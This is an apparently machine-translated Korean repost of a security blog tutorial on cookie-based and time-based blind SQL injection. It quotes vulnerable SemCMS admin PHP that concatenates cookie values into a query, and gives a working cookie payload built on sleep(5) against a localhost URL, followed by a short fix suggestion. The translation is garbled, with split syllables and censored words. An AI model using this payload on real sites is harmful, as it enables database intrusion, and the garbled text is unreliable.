WEB 보안 시 리 즈 는 SQL 주입 구멍 을 어떻게 발굴 합 니까? (시간 블라인드 + 쿠키 주입)
WEB 보안 시 리 즈 는 SQL 주입 구멍 을 어떻게 발굴 합 니까? (시간 블라인드 + 쿠키 주입)
0x01 머리말 네 번 째 편 입 니 다. 0x 02. 쿠키 주입 이란 무엇 입 니까? ASP 에서 request 대상 은 클 라 이언 트 가 제출 한 데 이 터 를 가 져 오 는 데 자주 사용 되 는 get 과 post 두 가지 방식 입 니 다. 또한 request 대상 은 집합 을 통 해 데 이 터 를 얻 지 않 고 'request ("name")' 를 직접 사용 할 수 있 습 니 다. 그러나 효율 이 낮 고 오류 가 발생 하기 쉽 습 니 다. 구체 적 인 집합 이름 을 생략 할 때 asp 는 QueryString (get), Form (post), Cookie, Severvariable 을 누 릅 니 다.집합 순서 로 검색 하 는. cookie 는 클 라 이언 트 에 저 장 된 텍스트 파일 로 수정 할 수 있 습 니 다. 그러면 Request. cookie 방식 으로 변수의 값 을 제출 하여 시스템 의 구멍 을 이용 하여 주입 * * * 할 수 있 습 니 다. 데이터베이스 모드 를 명 확 히 하고 데 이 터 를 추출 하 며 주입 가능 한 파 라 메 터 를 식별 할 수 있 습 니 다.이러한 방식 의 * * * 는 웹 사 이 트 를 통 해 사용자 가 입력 한 피드백 정 보 를 통 해 주입 가능 한 매개 변수, 데이터 베이스 모델 에 대해 추정 합 니 다. 이런 * * 구조의 조회 가 실 행 된 후에 얻 은 답 은 진실, 가짜 두 가지 밖 에 없습니다.추정 에 따 른 주입 방식 은 주로 시간 측정 주입 과 블라인드 주입 두 가지 로 나 뉜 다.전 자 는 주입 문 에 'waitfor 100' 과 같은 문 구 를 넣 고 이 조회 결과 가 나타 난 시간 에 따라 주입 성공 여부 와 데이터 값 범위 의 유도 에 대해 판단 합 니 다.후 자 는 주로 'and l = l', 'and l = 2' 두 가지 전형 적 인 주입 방법 이다.이러한 방식 은 모두 간접 적 으로 관련 되 고 응답 을 얻 을 수 있 는 문제 에 대해 질문 을 한 다음 에 응답 정 보 를 통 해 원 하 는 정 보 를 추정 한 다음 에 * * * 를 진행한다.0x03 시간 에 기초 한 맹주 의 위해 sql 주입 과 같은 0x 04 실전 사례 semcms 대외무역 사이트 관리 시스템 PHP 최신 버 전 /semcms/wqhr_Admin/Include/function.php 여기 서 쿠키 에서 scuser 와 scuserqx 를 가 져 온 후 sql 에 직접 연결 하여 블라인드 주 해 를 할 수 있 습 니 다.
[AppleScript] 일반 텍스트 보기
?
01
02
03
04
05
06
07
08
09
10
function checkuser
(
)
{
/
/
$cookieuser
=
@htmlspecialchars
(
$_COOKIE[
"scuser"
]
)
;
$cookieuserqx
=
@htmlspecialchars
(
$_COOKIE[
"scuserqx"
]
)
;
$sql
=
"select * from sc_user where user_ps='$cookieuser' and user_qx='$cookieuserqx'"
;
$
result
=
mysql_query
(
$sql
)
;
$row
=
mysql_fetch_array
(
$
result
,
MYSQL_ASSOC
)
;
if
(
!mysql_num_rows
(
$
result
)
)
{
echo
"alert(' !');top.location.href='index.html'; "
;
}
else
{
echo'';
}
}
http://127.0.0.1/semcms/wqhr_Admin/SEMCMS_Top_include. phpcookie: scuser = admin 'or if (substring (user (), 1, 4) = 0x726f6f 74, sleep (5), 1) -- 1 user () 의 네 글자 가 root 이면 지연 되 지 않 습 니 다. 복구 제안 위험 문 자 를 걸 러 내 고, 사전 컴 파일 을 사용 하여 추가 삭제 검 사 를 진행 합 니 다.
지식, 글, 쿠키, 표현 식, mysql
다음으로 전송:https://blog.51cto.com/baiabi/1834292
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
다양한 언어의 JSONJSON은 Javascript 표기법을 사용하여 데이터 구조를 레이아웃하는 데이터 형식입니다. 그러나 Javascript가 코드에서 이러한 구조를 나타낼 수 있는 유일한 언어는 아닙니다. 저는 일반적으로 '객체'{}...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.